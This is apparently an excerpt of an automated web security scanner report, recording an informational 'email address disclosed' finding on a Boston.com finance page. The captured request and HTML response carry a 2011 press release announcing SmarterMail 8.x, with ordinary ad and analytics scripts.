<li><a href="https://bostonglobe.com/advertiser/">Advertise</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a></li><li class="listPipe">|</li>
<li><a rel="nofollow" href="http://services.bostonglobe.com/globestore/category.cgi?category=0&amp;source=bcomfooter&amp;kw=bcomfooter1">The Boston Globe Store</a></li><li class="listPipe">|</li>
<li>&copy; <script> var crYear = new Date(); document.write(crYear.getFullYear());</script> NY Times Co.</li>
</ul>
</div>

</div>

</div>
</div>
</div>
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUP');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('POPUN');
//--></script><!--End Ad Tag-->
<!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('EXTRA');
//--></script><!--End Ad Tag-->
<!-- SiteCatalyst code version: G.5. Copyright 1997-2003 Omniture, Inc. More info available at http://www.omniture.com --><script
language="JavaScript"><!--
var s_pageName='Business | Markets | Financial Content (all)',s_channel='Business',s_prop1='Business | Markets';
var s_server='',s_pageType='',s_prop2='',s_prop3='',s_prop4='',s_prop5='',s_prop6='Financial Content page',s_prop7='',s_prop8='',s_prop9='',s_prop10='';
/* E-commerce Variables */
var s_campaign='',s_state='',s_zip='',s_events='',s_products='',s_purchaseID='',s_eVar1='',s_eVar2='',s_eVar3='',s_eVar4='',s_eVar5='',s_eVar6='',s_eVar7='',s_eVar8='',s_eVar9='',s_eVar10='';
var s_code='' ;
//--></script>
<script language="JavaScript" src="http://cache.boston.com/omniture/s_code.js"></script>

<script language="JavaScript"><!--
var s_wd=window,s_tm=new Date;if(s_code!=' '){s_code=s_dc('nytbglobe');if(s_code)document.write(s_code);}else document.write('<im'+'g src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--FB/s'+s_tm.getTime()+'?[AQB]'+'&j=1.0&[AQE]" height="1" width="1" border="0" alt="" />');
//--></script><script language="JavaScript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-');
//--></script><noscript><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/G.5--NS/0" height="1" width="1" border="0" alt="" /></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: G.5. -->
<!--Tacoda-->
<script language="JavaScript"><!--
var tcdacmd='dt;da;sc=Business | Markets';
//--></script>
<script src="http://an.tacoda.net/an/13651/slf.js" language="JavaScript"></script>
<!--End Tacoda-->

</body>
</html>




5. Email addresses disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.boston.com
Path:   /boston/news/read

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /boston/news/read?GUID=17744398 HTTP/1.1
Host: finance.boston.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801iXt4ADx8I; RMFL=011PrVAnU105z0Y; s_vi=[CS]v1|26B12F7205013BD8-600001032000CCFA[CE]; __qca=P0-1640891764-1298293742855; ssbusi=1; RMFD=011PrVUgO105wRm|O205ya3|O105yhs; __utmz=60064574.1298293750.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=60064574.1031200570.1298293750.1298293750.1298293750.1; __unam=b6206f2-12e4856c7b4-3e483bb3-1; bcpage=5; anonId=e9e75675-22e2-4aa9-9380-30d86642b1dc

Response

HTTP/1.1 200 OK
Date: Wed, 16 Mar 2011 22:44:46 GMT
Server: nginx/0.8.15
Content-Type: text/html; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Wed, 16 Mar 2011 22:44:46 GMT
Age: 1
X-Cache: HIT from squid2.sv1.financialcontent.com
X-Cache-Lookup: HIT from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 35383

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference | Stock Market Summary (NSDQ, NYSE, AMEX and more) on Boston.com </title>
<meta name="robots" content="noarchive" />
<meta http-equiv="Keywords" content="stock market summary, stock information, nsdq, nyse, amex" />
<meta http-equiv="Description" content="Find the latest stock activity of the day with our stock market summary on Boston.com" />
<meta http-equiv="charset" content="iso-8859-1">
<link rel="search" type="application/opensearchdescription+xml" title="Boston.com Local Search" href="http://cache.boston.com/search/files/bostonsearch.xml" />
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles.css" type="text/css" />
<!--[if IE]><link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_global_styles_ie.css" type="text/css" /><![endif]-->
<script language="JavaScript" type="text/javascript" src="http://cache.boston.com/universal/js/bcom_global_scripts.js"></script>
<script language="javascript" type="text/javascript" src="http://cache.boston.com/universal/js/jquery-1.3.2.min.js"></script>
<link rel="stylesheet" href="http://cache.boston.com/universal/css/bcom_section_styles.css" type="text/css" />
<script>ifSafari();</script>
<!--Weather Query Params--><script language="JavaScript1.1" type="text/javascript" src="http://cache.boston.com/weather-ad-include.js"></script>
<!--Begin OAS MJX setup tag--><script language="JavaScript"><!--
//configuration
var site=document.URL.toLowerCase().match(/s_campaign=(\w+)/);
if (!(site))
{campaign="0000"}
else
{campaign=site[1]};
var siteMarket=document.URL.split('/');
if (siteMarket[3] == 'boston?Page=MarketSummary')
OAS_sitepage='www.boston.com/business/markets/homepage'
else
OAS_sitepage='www.boston.com/business/markets';
OAS_listpos='TOP,INTRO,BOTTOM,POPUP,POPUN,EXTRA,BILLBOARD,SPONSOR1,SPONSOR2,SPONSOR3,SPONSOR4,SPONSOR5,SPONSOR6,CENTRAL';
oasquery='pagetype=generic_page&RM_Exclude=exclude_generic_page&s_campaign='+campaign;if(typeof OAS_query=='undefined'||!OAS_query)OAS_query=oasquery;else OAS_query+='&'+oasquery;
OAS_url='http://rmedia.boston.com/RealMedia/ads/';OAS_target='_top';OAS_version=10;OAS_rn='001234567890';OAS_rns='1234567890';OAS_rn=new String(Math.random());OAS_rns=OAS_rn.substring(2, 11);
//--></script><script language="JavaScript1.2"><!--
var rerefer=/referrer=(\w+)/,urefer=document.URL.match(rerefer);if(urefer){if(OAS_query){var reexclude=/RM_Exclude=[\w,*]+/,OAS_query=OAS_query.replace(reexclude,OAS_query.match(reexclude)[0]+',exclude_referrer_'+urefer[1].toLowerCase());OAS_query+='&';}OAS_query+=urefer[0];}
//--></script><script language="JavaScript"><!--
function OAS_NORMAL(pos){document.writeln('<A HREF="'+OAS_url+'click_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+ pos+'?'+OAS_query+'" TARGET='+OAS_target+'>');document.writeln('<IMG SRC="'+OAS_url+'adstream_nx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'!'+pos+'?'+OAS_query+'" BORDER=0></A>');}
//--></script><script language="JavaScript1.1"><!--
OAS_version=11;if((navigator.userAgent.indexOf('Mozilla/3')!=-1)||navigator.userAgent.indexOf('Mozilla/4.0 WebTV')!=-1){OAS_version=10;}if(OAS_version >= 11)document.writeln('<SCR'+'IPT LANGUAGE=JavaScript1.1 SRC="'+OAS_url+'adstream_mjx.ads/'+OAS_sitepage+'/1'+OAS_rns+'@'+OAS_listpos+'?'+OAS_query+'"> <\/SCRIPT>');
//--></script><script language="JavaScript"><!--
document.writeln('');
function OAS_AD(pos){if(OAS_version >= 11)OAS_RICH(pos);else OAS_NORMAL(pos);}
//--></script><!--End OAS MJX setup tag-->
<script language="JavaScript"><!--
var var5 = 'business_';
//--></script>
<style>
<!--
#globalNavRedux #nav li#gbusiness {background-color:#3F5F9C; background-image:url(http://cache.boston.com/universal/site_graphics/nav_main_on.gif);}
#globalNavRedux #nav li#gbusiness a {color:#fff;}
//--></style>
<style>
<!--
#globalNavRedux #sNav a#secnav_markets, a#secnav_markets:link, a#secnav_markets:visited, a#secnav_markets:active, a#secnav_markets:hover { font-weight: bold; text-decoration: none; color: #000; }
//--></style>
</head>
<body onload="windowLoaded();displayEmbed();">
<div id="container">

<div id="containerBorder">
<div id="header">
<div id="headL">
    <div id="mastHead">
    <a href="http://www.boston.com" class="imageLink"><img src="http://cache.boston.com/universal/site_graphics/bcom_small.gif"></a>
<div id="searchForm">
<div><span onclick="choose(this);" id="searchLocal" class="searchOn">Local Search</span> <span onclick="choose(this)" id="searchSite">Site Search</span></div>
<script>otherTab = document.getElementById('searchLocal');</script>
<form action="http://search.boston.com/local/Search.do" onsubmit="searchSubmit();">
<input type="text" name="s.sm.query" id="textField"><input type="submit" value="GO" class="form-button" />
<input type="hidden" id="tab" name="s.tab" value="" />
</form>
</div>
    </div>
    </div>
<div id="headR">
<div id="signIn">
<span id="login" class="utility"><script language="JavaScript"><!--
try{showLoginRRD(147);}catch(e){document.writeln('&nbsp;');}
//--></script><noscript>&nbsp;</noscript></span>
<span id="globeLogo"><span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&amp;od=28">Home Delivery</a></span><a href="http://www.boston.com/bostonglobe/"><img src="http://cache.boston.com/universal/site_graphics/glogo.jpg" /></a></span>
</div>
<div id="headAd">
<div align="center" cellpadding="0"
cellspacing="0" border="0"><div
class="bannerAd" align="center"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('TOP');
//--></script><!--End Ad Tag--></div></div>
</div>
</div>
</div>
<div id="globalNavRedux">
<ul class="gnavContainer" id="nav"><li id="ghome"><a
href="http://www.boston.com/">Home</a></li><li
id="gglobe"><a href="http://www.boston.com/bostonglobe">Today's Globe</a></li><li
id="gnews"><a href="http://www.boston.com/news/">News</a></li><li
id="gbusiness"><a href="http://www.boston.com/business/">Business</a></li><li
id="gsports"><a href="http://www.boston.com/sports/">Sports</a></li><li
id="glifestyle"><a href="http://www.boston.com/lifestyle/">Lifestyle</a></li><li
id="gae"><a href="http://www.boston.com/ae/">A&amp;E</a></li><li
id="gthings"><a href="http://www.boston.com/thingstodo/">Things to do</a></li><li
id="gtravel"><a href="http://www.boston.com/travel/">Travel</a></li><li
id="gcars"><a href="http://www.boston.com/cars/">Cars</a></li><li
id="gjobs"><a href="http://www.boston.com/jobs/">Jobs</a></li><li
id="gre"><a href="http://www.boston.com/realestate/">Homes</a></li><li
id="gsearch"><a href="http://search.boston.com/">Local Search</a></li></ul>

<ul id="sNav"><li><a href="http://www.boston.com/business/technology/"
id="secnav_technology">Technology</a></li><li><a
href="http://www.boston.com/business/healthcare/"
id="secnav_healthcare">Healthcare</a></li><li><a
href="http://finance.boston.com/boston?Page=MarketSummary"
id="secnav_markets">Markets</a></li><li><a
href="http://www.boston.com/business/personalfinance/"
id="secnav_personalfinance">Personal finance</a></li><li><a
href="http://www.boston.com/business/columnists/"
id="secnav_columnists">Columnists</a></li></ul>

</div>
<div id="introad" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('INTRO');
//--></script><!--End Ad Tag--></div>
<div id="billboardAd" class="adContainer"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('BILLBOARD');
//--></script><!--End Ad Tag--></div>



<div class="hideMe"><!--
<headline>More financial news</headline>
<source>Boston.com</source>
<teasetext>Check out the More financial news Page on Boston.com. </teasetext>
<byline></byline>
<date>August 24, 2009</date>
--></div>


<div id="content" class="section section95">
<div id="Col1">


<style type="text/css">@import url(http://finance.boston.com/client/boston/privatelabel.css);</style><style type="text/css">@import url(http://finance.boston.com/client/boston/boston/privatelabel.css);</style><div class="span invc">

<script src="http://js.financialcontent.com/FCON/FCON.js" type="text/javascript"></script>
<script type="text/javascript">
FCON.initialize('http://js.financialcontent.com/',false,'finance.boston.com','boston','');
</script>

<style type="text/css">@import url(http://finance.boston.com/privatelabel/privatelabel1.css);</style>
<script type="text/javascript">
document.FCON.setAutoReload(1800);
</script>

<div class="span nav">
<div class="investingnav1">
<div class="menu clearfix" hoverable="true">
<div class="item active" hoverable="true"><a href="http://finance.boston.com/boston/markets?">Markets</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/quote?Symbol=%24MASS">MA Stock Indexes</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/stocks?">Stocks</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/funds?">Mutual Funds &amp; ETF&#39;s</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/sectors?">Sectors</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/rates?">Rates</a></div>
<div class="item " hoverable="true"><a href="http://finance.boston.com/boston/user/login?">Tools</a></div>
</div>
<div class="items clearfix">
<div class="item "><a href="http://finance.boston.com/boston/markets?">Overview</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/news?">Market News</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/video?">Market Videos</a></div>
<div class="item "><a href="http://finance.boston.com/boston/currencies?">Currencies</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/international?">International</a></div>
<div class="item "><a href="http://finance.boston.com/boston/markets/treasury?">Treasury &amp; Bonds</a></div>
</div>

<div class="getquote clearfix">
<div class="clearfix">
<div class="tickerbox" id="investingnav_tickerbox"></div>
<a class="investingnav_search" href="http://finance.boston.com/boston/search?">Search InvestCenter</a>
</div>
<div class="hotlinks clearfix">
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/recentquotes?">Recent Quotes</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/recentquotes?">View Full List</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next" href="http://finance.boston.com/boston/user/watchlist?">My Watchlist</a>
<div class="drop_items" style="display:none">
<div class="morelink clearfix"><a href="http://finance.boston.com/boston/user/watchlist?">Create Watchlist</a></div>
</div>
</div>
<div class="hotlink">
<a class="drop" hoverMenu="_next">Top Indices</a>
<div class="drop_items" style="display:none">
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=310%3A998313">Dow Jones Industrial Average</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=67%3A998356">NASDAQ Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=845%3A998434">Standard &amp; Poors 500</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A1540753">NYSE COMPOSITE INDX</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=69%3A568249">Amex Composite</a></div>
<div class="clearfix"><a href="http://finance.boston.com/boston/quote?Symbol=771%3A998819">Russell 2000</a></div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript">
document.FCON.loadLibrary('Hover');
document.FCON.loadLibraryImmediately('QuoteAPI');
document.FCON.loadLibraryImmediatelyCallback('TickerBox',
function () {
document.FCON.TickerBox.create(document.getElementById("investingnav_tickerbox"));
}
);
</script>
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/nav/investingnav1.css);</style>

</div>

<div class="span page">
<div class="widget">
<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/news/newsread1.css);</style><div class="newsread clearfix">
<div class="title" id="newsItemTitle">SmarterTools Introduces SmarterMail 8.x: Where the Little Things Make All the Difference</div>
<div class="titleattributes clearfix">
<div class="pubdate"><div class="span date">Tuesday March 15, 2011 - 06:15 AM EDT</div></div>
<div class="channel"><a href="http://finance.boston.com/boston/news/channelinfo?ChannelID=3191">Business Wire News Releases</a></div>
<div class="releasedBy">Released By <a href="http://finance.boston.com/boston/news/releasedby?ReleasedBy=SmarterTools+Inc.">SmarterTools Inc.</a></div>
</div>



<div class="floatright">

<div class="fcadunit">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=2153");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>

<div class="sidebar clearfix">

<div class="companylogo"><img src="http://rss.financialcontent.com/images/feed/150px/2/72/272846.img" /></div>




<div class="share">
<div class="span label">Share:</div>
<!-- AddThis Button BEGIN -->
<script type="text/javascript">var addthis_pub="mdierolf";</script>
<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()"><img src="http://s7.addthis.com/static/btn/lg-share-en.gif" width="125" height="16" alt="Bookmark and Share" style="border:0"/></a><script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
<!-- AddThis Button END -->
</div>
<script type="text/javascript">
zoomLevel = 100;
</script>
<!--DOCUMENT NEWSENGINE TOOLS-->
<div class="mediatools">
<div class="mediatool" style="display:none">
<div class="label">Text Size:</div>
<div class="icon_txt_enlarge"><a href="#" onclick="zoomLevel += 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
<div class="icon_txt_shrink"><a href="#" onclick="zoomLevel -= 10; document.getElementById('mediaZoom').style.fontSize = zoomLevel + '%'; return false">&nbsp;</a></div>
</div>




</div>
</div>

</div>




<div class="body" id="news_body">
<div id="mediaZoom">
<span xmlns="http://www.w3.org/1999/xhtml"><span><span/></span><span><p>
SmarterTools Inc. is proud to announce the release of SmarterMail 8.x, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=a+Microsoft+Exchange+alternative&amp;index=1&amp;md5=7d76eda161427115af85fc945239bff9" popable="true" rel="nofollow">a
Microsoft Exchange alternative</a> for any business. The latest release
of their popular <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=mail+server+software&amp;index=2&amp;md5=b564c275a54066759223e738b508bd55" popable="true" rel="nofollow">mail
server software</a> focuses on enhancing the user experience with
touch-and-go functionality, improved contact sharing, enhanced signature
options, new message notifications, password strength enforcement for
administrators and much more.
</p><p>
...The last few releases of the SmarterMail have centered on enhancing the
user experience,... said Tim Uzzanti, CEO of SmarterTools. ...With
SmarterMail 7.x we redesigned and simplified our webmail interface,
introduced the synchronization center and file storage, and improved
mailbox searching. With SmarterMail 8.x, we...ve continued to fine-tune
and simplify the user experience while adding even more functionality to
our award-winning mail server....
</p><p>
New features and enhancements in SmarterMail 8.x include:
</p><ul><li><b>Touch-and-go functionality</b> ... Emailing a contact, mapping an
address or adding an email address to your contacts list has never
been easier. SmarterMail 8.x introduces clickable addresses, phone
numbers and email addresses for click-to-map, click-to-call and
click-to-mail functionality in messages, contact details, calendar
items, tasks and notes.
</li><li><b>Improved contact sharing</b> ... Users can now download, save or send
contact details in .CSV or vCard format, making it easy to share the
email address or phone number of a friend or colleague in their
SmarterMail address book.
</li><li><b>New message notifications</b> ... Now users receive a notification
that they...ve received a new message no matter which section of the
interface they are viewing.
</li><li><b>Built-in filters for viewing messages</b> ... View read messages,
unread messages, replied to messages, forwarded messages or all
messages with attachments with the click of the mouse.
</li><li><b>Synchronization Center Translation </b>... The synchronization center
now detects the browser language and automatically translates the sync
info into that language, making it easier to provide info about
available sync protocols to international users.
</li><li><b>Password retrieval and compliancy options</b> ... When enabled, users
that can...t remember their password will receive an email to their
backup email address with instructions on resetting their password.
Plus, system administrators can use the new password compliance report
to identify users that don...t meet the specified password requirements
and send them a request to change their passwords.
</li><li><b>Improved performance </b>... Numerous optimizations to SmarterMail
8.x reduce disk I/O by an average of 25%. This includes better grid
controls, improved charting and an update to the Microsoft .NET 4.0
Framework.
</li><li><b>Improved administration </b>... With better spool management,
enhancements to IP binding settings, hard limit throttling and support
for SPF RR lookups, mail server administration is easier and more
convenient. Plus, system administrators have access to even more Web
services.
</li></ul><p>
SmarterMail is available at the SmarterTools website and through <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fpartners%2Fpartner-programs.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=authorized+resellers&amp;index=3&amp;md5=eecda7962c7be742b82516312b289374" popable="true" rel="nofollow">authorized
resellers</a>. A complete list of new features and improvements is
available by viewing the <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Freleasenotes%2Fv8.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=SmarterMail+8.x+release+notes&amp;index=4&amp;md5=c659640f16082fef51f6291b3a607ccb" popable="true" rel="nofollow">SmarterMail
8.x release notes</a>.
</p><p>
Follow us on Twitter: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Ftwitter.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=%40smartertools&amp;index=5&amp;md5=c9f7577c4e2744f5a5eb2eced46ec764" popable="true" rel="nofollow">@smartertools</a></p><p>
Watch our videos on YouTube: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fwww.youtube.com%2Fsmartertools&amp;index=6&amp;md5=49ce4902c30a8a3499da6a058636f483" popable="true" rel="nofollow">http://www.youtube.com/smartertools</a></p><p>
Read our blog: <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fblog.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=http%3A%2F%2Fblog.smartertools.com&amp;index=7&amp;md5=f09b9ee5597016741dc2a3d48b77903a" popable="true" rel="nofollow">http://blog.smartertools.com</a></p><p>
About SmarterTools Inc.
</p><p>
Founded in 2003, SmarterTools Inc. is an information technology
management software company based in Phoenix, Arizona. SmarterTools
develops a <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartermail%2Fmail-server-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Windows+mail+server&amp;index=8&amp;md5=753dfcf21359acd124f726ecf17ba3d3" popable="true" rel="nofollow">Windows
mail server</a>, <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmartertrack%2Fhelp-desk-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=customer+service+software&amp;index=9&amp;md5=3858e9ddaccf462e4a8dea61fcdcfbb6" popable="true" rel="nofollow">customer
service software</a>, and <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com%2Fsmarterstats%2Fweb-analytics-seo-software.aspx&amp;esheet=6647089&amp;lan=en-US&amp;anchor=Web+log+analytics+and+SEO+software&amp;index=10&amp;md5=ee1830947b29223ebfa4d4bd225e4e56" popable="true" rel="nofollow">Web
log analytics and SEO software</a> that help companies communicate,
measure, and support their worldwide business operations. Additional
information about SmarterTools Inc. and the SmarterTools product line is
available at <a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.smartertools.com&amp;esheet=6647089&amp;lan=en-US&amp;anchor=www.smartertools.com&amp;index=11&amp;md5=45670fe0032c618fc71f4715ff97e2fc" popable="true" rel="nofollow">www.smartertools.com</a>.
</p><p>
Microsoft Exchange and Windows are trademarks of Microsoft Corporation [<a href="http://cts.businesswire.com/ct/CT?id=smartlink&amp;url=http%3A%2F%2Fwww.marketwatch.com%2Fquotes%2Fmsft&amp;esheet=6647089&amp;lan=en-US&amp;anchor=MSFT&amp;index=12&amp;md5=ca906155f80a16d742609363657b0485" popable="true" rel="nofollow">MSFT</a>].
</p><p><img alt="" src="http://cts.businesswire.com/ct/CT?id=bwnews&amp;sty=20110315005734r1&amp;sid=6434&amp;distro=ftp"/><span/></p></span></span> </div>
</div>
<script type="text/javascript">
function scanBody () {
document.FCON.loadLibraryCallback('HoverQuote', function() {
document.FCON.HoverQuote.scanTags(document.getElementById('news_body'));
});
}
setTimeout("scanBody()",50);
</script>

<div class="data contacts">
Contacts: <br /><br />
<fc:contacts xmlns="http://www.w3.org/1999/xhtml"><b>SmarterTools</b><br/>Derek Curtis<b>, </b>VP of Marketing,
623-434-8050<br/><a href="mailto:dcurtis@smartertools.com">dcurtis@smartertools.com</a></fc:contacts>
</div>


<div class="mediatool icon_print"><a href="#" onclick="window.print(); return false;">Print this story</a></div>
<div class="mediatool icon_email"><a href="#" onclick="emailAFriend(document.getElementById('newsItemTitle'),location.href,document.getElementById('newsItemTitle').innerHTML); return false;" >Email this story</a></div>
<div class="mediatool icon_pdf"><a href="http://finance.boston.com/boston/action/getnewspdf?GUID=17744398">Download PDF</a></div>
</div>



</div>

</div>

<div style="padding:0 10px 10px 10px">
<script type='text/javascript'>
var m3_u = 'http://ads.financialcontent.com/www/delivery/ajs.php';
var m3_r = Math.floor(Math.random()*99999999999);
if (!document.MAX_used) document.MAX_used = ',';
document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
document.write ("?zoneid=1837");
document.write ('&amp;cb=' + m3_r);
if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
document.write ("&amp;loc=" + escape(window.location));
if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
if (document.context) document.write ("&context=" + escape(document.context));
if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
document.write ("'></scr"+"ipt>");
</script>
</div>
<div class="attribution">
<a href="http://www.financialcontent.com" style="font-weight:bold">Stock Market XML and JSON Data API</a> provided by FinancialContent Services, Inc.<br />
Nasdaq quotes delayed at least 15 minutes, all others at least 20 minutes. <br />
By accessing this page, you agree to the following
<a href="http://www.financialcontent.com/tos.html" target="_blank" >terms and conditions</a>.<br />
<a href="http://rates.banks.com/mortgage-rates/" target="_blank" >Mortgage Rates</a>, <a href="http://rates.banks.com/cd-rates/" target="_blank" >CD Rates</a> &amp;
<a href="http://rates.banks.com/home-equity-rates/" target="_blank" >Home Equity Rates</a> provided by <a href="http://www.banks.com/" target="_blank" >Banks.com</a>
<br />
<a href="http://www.prconnect.com/" target="_blank" >Press Release Service</a> provided by PRConnect.
<br />
Fundamental data supplied by Morningstar<br />
Stock quotes supplied by Telekurs USA<br />
<a style="display:none" href="http://www.financialcontent.com/honeypot/">Bots go here</a>
</div>

<style type="text/css">@import url(http://finance.boston.com/widget/privatelabel/attribution/attribution1.css);</style>

<script>
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Ffinance.boston.com%2Fboston%2Fnews%2Fread%3FHTTP_HOST%3Dfinance.boston.com%26HTTPS%3Doff%26GUID%3D17744398&Type=page&Client=boston&rand=' + Math.random();
head.appendChild(script);
</script>

<script>
_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src="http://edge.quantserve.com/quant.js";
head.appendChild(script);
</script>
<script langugage="JavaScript">var tcdacmd="dt";</script> <script
src="http://an.tacoda.net/an/18181/slf.js" language="JavaScript"></script>
</div>



</div>
<div id="Col2">
<div id="railTop"></div>
<div class="fixedAds"><div><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('CENTRAL');
//--></script><!--End Ad Tag--></div></div>
</div>
<div id="Col3"></div>
<div class="cf"></div>
</div>

<div id="footer">
<div id="bottomBanner">
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR1');
//--></script><!--End Ad Tag--></div>
<div class="sponLinks"><!--OAS MJX Ad Tag--><script language="JavaScript"><!--
OAS_AD('SPONSOR2');
//--></script><!--End Ad Tag--></div>
